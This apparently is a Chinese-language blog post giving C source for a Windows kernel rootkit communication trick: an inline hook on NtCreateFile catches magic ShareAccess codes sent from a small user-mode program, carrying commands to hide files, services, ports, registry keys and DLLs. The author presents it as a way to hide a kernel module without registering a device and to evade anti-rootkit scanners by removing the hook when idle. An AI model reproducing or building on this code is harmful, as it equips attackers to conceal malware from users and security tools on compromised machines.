ring0代碼:
#define NO_MSG 0x88882048
#define START_PROTECT 0x88884086
#define START_HIDEFILE 0x88884087
#define START_HIDESERVICES 0x88884088
#define START_HIDEPORT 0x88884089
#define START_HIDEKEY 0x88884090
#define START_CHECKHOOK 0x88884091
#define START_PARAKEY 0x88884092
#define START_DLLPATH 0x88884093
#define START_CLEARFILER 0x88884094
#define START_HOOKIOCREATEFILE 0x88884095
#define START_HIDEDLL 0x88884096
VOID DispatchIoctl(ULONG IRPcode,WCHAR *buf,ULONG uInSize)
{
//執行你的代碼~~!
}
#pragma LOCKEDCODE
NTSTATUS NewNtCreateFile(OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER AllocationSize OPTIONAL,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PVOID EaBuffer OPTIONAL,
IN ULONG EaLength)
{
NTSTATUS status;
WCHAR lpwCommand[100];
BOOL hcheck = FALSE;
switch(ShareAccess)
{
case START_PROTECT:
hcheck = TRUE;
break;
case START_HIDEFILE:
hcheck = TRUE;
break;
case START_HIDEKEY:
hcheck = TRUE;
break;
case START_HIDESERVICES:
hcheck = TRUE;
break;
case START_HIDEPORT:
hcheck = TRUE;
break;
case START_PARAKEY: //
hcheck = TRUE;
break;
case START_DLLPATH:
hcheck = TRUE;
break;
case START_CLEARFILER:
hcheck = TRUE;
break;
case START_CHECKHOOK:
hcheck = TRUE;
break;
case START_HOOKIOCREATEFILE:
hcheck = TRUE;
break;
case START_HIDEDLL:
hcheck = TRUE;
break;
}
if (hcheck == TRUE)
{
RtlZeroMemory(lpwCommand,100);
memcpy(lpwCommand,ObjectAttributes->ObjectName->Buffer,ObjectAttributes->ObjectName->Length);
DispatchIoctl(ShareAccess,lpwCommand,wcslen(lpwCommand)); //和驅動通信函數~~
hcheck = FALSE;
return FALSE;
}
OldNtCreateFile = (NtCreateFile)NtCreateFileHookZone;
status = OldNtCreateFile(FileHandle,
DesiredAccess,
ObjectAttributes,
IoStatusBlock,
AllocationSize,
FileAttributes,
ShareAccess,
CreateDisposition,
CreateOptions,
EaBuffer,
EaLength);
return status;
}
////////////////////////////////////////////
ring3代碼就很簡單了:
#include <windows.h>
#include <stdio.h>
#define NO_MSG 0x88882048
#define START_PROTECT 0x88884086
#define START_HIDEFILE 0x88884087
#define START_HIDESERVICES 0x88884088
#define START_HIDEPORT 0x88884089
#define START_HIDEKEY 0x88884090
#define START_CHECKHOOK 0x88884091
#define START_PARAKEY 0x88884092
#define START_DLLPATH 0x88884093
#define START_CLEARFILER 0x88884094
#define START_HOOKIOCREATEFILE 0x88884095
#define START_HIDEDLL 0x88884096
int main(int argc, char *argv[])
{
if (argc!=2)
{
printf("used:%s lpk.dll\r\n",argv[0]);
return 0;
}
HANDLE hFile = CreateFile(argv[1], GENERIC_READ, START_HIDEFILE ,NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
return TRUE;
}
這樣就不需要註冊Device,在隱藏內核模塊的時候,比較方便~~!不需要通信的時候,恢復inline hook免得被ARK工具掃出來~~
還有很多函數可以用,仁者見仁智者見智了~~
沒有留言:
張貼留言